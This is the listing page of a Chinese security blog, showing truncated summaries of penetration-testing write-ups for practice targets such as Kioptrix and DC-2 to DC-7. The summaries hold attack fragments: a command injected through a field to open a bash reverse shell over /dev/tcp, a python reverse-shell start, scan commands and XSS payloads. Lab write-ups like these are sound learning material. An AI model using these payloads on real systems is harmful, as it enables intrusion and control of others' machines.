会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
木捏牛
除却巫山不是云
博客园
首页
新随笔
联系
管理
上一页
1
2
3
4
5
6
7
下一页
2021年12月8日
kioptrix level-1.1
摘要: # kioptrix level-1.1 存活检测 端口扫描 80访问 查看源代码 尝试爆破,先试一下,无结果 尝试万能密码,sql注入 万能密码可以绕过登录 替换数据包进行登录 登录成功 命令执行 反弹shell 127.0.0.1 | bash -i >& /dev/tcp/192.168.2
阅读全文
posted @ 2021-12-08 15:45 木捏牛
阅读(98)
评论(0)
推荐(0)
2021年12月7日
kioptrix level-1
摘要: # kioptrix 存活探测 端口扫描 服务识别 可测试139 目录扫描 没什么可利用的 139端口渗透 使用msf查询靶机samba版本 msf6 > search smb_version Matching Modules # Name Disclosure Date Rank Check D
阅读全文
posted @ 2021-12-07 16:07 木捏牛
阅读(177)
评论(0)
推荐(0)
2021年12月6日
mrRobot靶机渗透
摘要: # Myrebot 存活探测 端口扫描 开放80 22 443 访问80 访问页面 是一个命令行界面,输入提示的join,看到如下的界面 习惯性看一下源码,看到这些,应该是wordpress的网站 目录扫描 sudo dirsearch -u http://10.0.4.17 -e * 存在的页面
阅读全文
posted @ 2021-12-06 22:43 木捏牛
阅读(54)
评论(0)
推荐(0)
2021年3月16日
DC-7
摘要: DC-7 存活探测 端口扫描 访问80 百度得知入口点 github搜索 ssh登陆 mbox邮件 backup gpg未某种加密方式的文件 backup.sh 更改密码 Drupal 使用Drush是专门服务于drupal的第三方模块。使用drush 来更改admin用户的密码 登录 利用 蚁剑连
阅读全文
posted @ 2021-03-16 21:32 木捏牛
阅读(111)
评论(0)
推荐(0)
2021年3月14日
DC-6
摘要: DC-6 发现主机 扫描主机 80服务 WordPress扫描 默认后台 制作字典爆破 wpscan扫描用户 开始爆破 登陆后台 考虑插件漏洞 利用 反弹shell 交互式 graham密码 ssh登陆graham 脚本写入 jens无密码执行 反弹gens的shell 交互式 python -c
阅读全文
posted @ 2021-03-14 19:18 木捏牛
阅读(74)
评论(0)
推荐(0)
DC-5
摘要: DC-5 存活探测 端口扫描 从80入手 conract提交后,发现日期有变化,并且参数变量可控,猜测文件包含 尝试包含/etc/passwd 从日志文件入手 尝试写入shell 失败了很多次,恢复快照后,ip变了 反弹shell 返回交互式 中途断了一次,换了端口 python反弹 提权(/bin
阅读全文
posted @ 2021-03-14 13:51 木捏牛
阅读(95)
评论(0)
推荐(0)
2021年3月13日
DC-4
摘要: DC-4 主机存活探测 扫描 访问80 爆破http http登陆 抓包 可以执行系统命令 尝试反弹shell 返回交互式命令行 另外途径 看到三个用户,可以用来爆破 制作字典 ssh爆破 登陆 var/mail看到charles的密码 切换到charles teehee提权 操作过程如下: 1、e
阅读全文
posted @ 2021-03-13 21:04 木捏牛
阅读(107)
评论(0)
推荐(0)
2021年3月9日
DC-3
摘要: DC-3 探测IP 扫描主机 访问80 只有一个flag 扫描目录 whatweb查看 访问后台 搜索joomla漏洞 ##查看 利用sqlmap 库名 表名 字段名 数据 破解admin密码 登陆后台 写入shell 冰蝎连接 命令行反弹shell python -c 'import socket
阅读全文
posted @ 2021-03-09 22:48 木捏牛
阅读(117)
评论(0)
推荐(0)
2021年3月6日
DC-2
摘要: DC-2 发现主机 扫描主机 nmap -A -T4 -v -p- 192.168.233.148 访问80 访问不同 hosts文件修改 vim /etc/hosts 再次访问(flag1) 默认后台 制作字典(crew) 密码 用户名 wpscan扫描 wpscan --url http://d
阅读全文
posted @ 2021-03-06 19:09 木捏牛
阅读(105)
评论(0)
推荐(0)
2021年2月28日
pentestlabs
摘要: xss 第一题 <script>alert('xss')</script> <iframe src=javascript:alert('xss')></iframe> <a href=javascript:alert('xss')>ggtest</a> <img src=1 onerror=aler
阅读全文
posted @ 2021-02-28 15:41 木捏牛
阅读(90)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
7
下一页
公告